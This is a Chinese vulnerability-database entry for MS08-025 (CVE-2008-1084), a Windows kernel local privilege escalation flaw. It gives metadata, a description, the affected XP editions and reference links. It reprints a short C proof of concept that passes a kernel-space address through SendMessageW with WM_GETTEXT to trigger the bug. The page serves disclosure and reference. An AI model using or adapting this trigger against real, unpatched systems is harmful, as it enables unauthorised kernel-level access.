Microsoft Windows内核用户态回调本地权限提升漏洞(MS08-025)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114958 漏洞类型 代码注入
发布时间 2008-04-08 更新时间 2008-10-14
CVE编号 CVE-2008-1084 CNNVD-ID CNNVD-200804-105
漏洞平台 Windows CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/31585
https://www.securityfocus.com/bid/28554
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200804-105
|漏洞详情
MicrosoftWindows是微软发布的非常流行的操作系统。Windows内核处理用户传入的数据时存在漏洞,本地攻击者可能利用此漏洞提升自己的权限。Windows内核没有正确验证从用户态传递到内核的输入,允许攻击者以提升的权限运行代码。成功利用此漏洞的攻击者可执行任意代码,并可完全控制受影响的系统。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/28554/info

Microsoft Windows is prone to a local privilege-escalation vulnerability.

The vulnerability resides in the Windows kernel. A locally logged-in user can exploit this issue to gain kernel-level access to the operating system.
*/


#include 
#include 

int main(int argc,char *argv[])
{
    DWORD    dwHookAddress = 0x80000000;

    printf( "\tMS08-025 Local Privilege Escalation Vulnerability Exploit(POC)\n\n" );
        printf( "Create by Whitecell's Polymorphours@whitecell.org 2008/04/10\n" );

    SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, dwHookAddress );
    return 0;
}
|受影响的产品
Microsoft Windows XP Tablet PC Edition SP2 Microsoft Windows XP Professional x64 Edition SP2 Microsoft Windows XP Professional x64 Edition Microsoft Windows XP Professional SP2 Microsoft
|参考资料

来源:BID
名称:28554
链接:http://www.securityfocus.com/bid/28554
来源:SECTRACK
名称:1019803
链接:http://www.securitytracker.com/id?1019803
来源:MILW0RM
名称:5518
链接:http://www.milw0rm.com/exploits/5518
来源:MS
名称:MS08-025
链接:http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx
来源:VUPEN
名称:ADV-2008-1149
链接:http://www.frsirt.com/english/advisories/2008/1149/references
来源:SECUNIA
名称:29720
链接:http://secunia.com/advisories/29720
来源:OVAL
名称:oval:org.mitre.oval:def:5437
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:5437
来源:MISC
链接:http://milw0rm.com/sploits/2008-ms08-25-exploit.zip
来源:HP
名称:HPSBST02329
链接:http://marc.info/?l=bugtraq&m=120845064910729&w=2